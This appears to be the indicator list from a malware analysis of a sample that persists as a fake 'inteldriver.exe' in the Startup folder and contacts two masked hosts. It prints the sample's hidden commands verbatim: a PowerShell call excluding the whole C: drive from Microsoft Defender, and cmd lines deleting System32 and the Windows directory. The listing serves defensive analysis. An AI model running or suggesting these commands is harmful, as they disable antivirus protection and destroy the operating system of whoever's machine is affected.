Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\inteldriver.exe (located in the per-user Startup folder, so it is launched at each logon of that user)
- C:\users\public\expuslog.txt
- 'ha###bin.com':443 (hostname is partially masked with ### in this listing; port 443)
- 'pa###bin.com':443
- DNS ASK ha###bin.com (DNS query for the masked hostname listed above)
- DNS ASK pa###bin.com
- '%APPDATA%\microsoft\windows\start menu\programs\startup\inteldriver.exe'
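- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (with hidden window) — adds the whole C:\ drive to the Microsoft Defender exclusion list, so files anywhere on that drive are no longer scanned; Defender records such configuration changes as event ID 5007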
- '%APPDATA%\microsoft\windows\start menu\programs\startup\inteldriver.exe' ' (with hidden window)
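- '<SYSTEM32>\cmd.exe' /K del /q "%WINDIR% \System32\*" & exit' (with hidden window) — del /q deletes without prompting; this command and the two rmdir commands below target System32 and the Windows directory itself. The space after %WINDIR% is kept exactly as listed.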
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \System32" & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \" & exit' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Get-MpPreference -verbose (reads the current Microsoft Defender preference settings)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
- '<SYSTEM32>\cmd.exe' /K del /q "%WINDIR% \System32\*" & exit
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \System32" & exit
- '<SYSTEM32>\cmd.exe' /K rmdir "%WINDIR% \" & exit